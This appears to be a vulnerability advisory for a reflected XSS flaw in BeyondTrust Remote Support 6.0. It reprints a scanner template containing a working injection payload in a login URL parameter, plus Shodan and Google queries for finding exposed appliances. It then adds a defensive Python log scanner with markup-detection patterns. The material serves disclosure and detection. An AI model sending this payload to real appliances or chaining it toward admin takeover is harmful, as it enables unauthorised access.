beyond-trust-xss: BeyondTrust Remote Support 6.0 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: BeyondTrust Remote Support 6.0 | PoC: public

Vulnerability description

Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allows remote attackers to inject arbitrary web script or HTML. Remote attackers could achieve full admin access to the appliance by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.

PoC code [public]

id: beyond-trust-xss

info:
  name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
  reference:
    - https://www.exploit-db.com/exploits/50632
  classification:
    cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: beyondtrust
    product: remote_support
    shodan-query: html:"BeyondTrust"
    google-query: intext:"BeyondTrust" "Redistribution Prohibited"
  tags: beyondtrust,xss,intrusive,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<svg/onload=alert(document.domain)>") && contains(body, "beyondtrust")'
        condition: and
# digest: 490a00463044022026f2abd9b736fc49c20ab06c58478e0cbe540d2ad9e3d9facf720cca8b6e018702206b2c8e20b44fbca1daef071f182f7aef1e80c34daf6544a1829cbfe9dfc720e7:922c64590222798bb761d5b6d8e72950
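As an added defender-side example (not part of the original page or of the template above), the following Python scans web-server access-log lines for requests to /appliance/login whose login[...] parameters carry HTML markup, the reflected pattern the template probes for. The log lines are constructed samples, and the path and parameter names are taken from the template.

```python
import re
import urllib.parse

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /appliance/login?login[password]=abcd%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password HTTP/1.1" 200 5120
203.0.113.6 - - [01/Aug/2025:10:00:02 +0000] "GET /appliance/login HTTP/1.1" 200 4096
203.0.113.7 - - [01/Aug/2025:10:00:03 +0000] "POST /appliance/login HTTP/1.1" 302 0
203.0.113.8 - - [01/Aug/2025:10:00:04 +0000] "GET /appliance/login?login[password]=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Markup that has no business in a login form field: an opening tag, or an
# inline event-handler attribute such as onload= / onerror=.
MARKUP_RE = re.compile(r'<\s*[a-zA-Z]|\bon[a-z]+\s*=', re.IGNORECASE)


def fully_unquote(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly; double-encoded payloads are a common filter bypass."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_reflected_login_xss(log_text: str) -> list:
    """Return one record per login[...] parameter value that contains markup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = urllib.parse.urlsplit(m['target'])
        if parsed.path != '/appliance/login':
            continue
        # parse_qs decodes once; fully_unquote handles any further layers.
        params = urllib.parse.parse_qs(parsed.query, keep_blank_values=True)
        for name, values in params.items():
            if not name.startswith('login['):
                continue
            for raw in values:
                payload = fully_unquote(raw)
                if MARKUP_RE.search(payload):
                    hits.append({'ip': m['ip'], 'ts': m['ts'], 'param': name,
                                 'payload': payload, 'status': int(m['status'])})
    return hits
```

A 200 response to such a request (as opposed to a rejected or redirected one) is the signal that the reflection likely succeeded and deserves follow-up.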
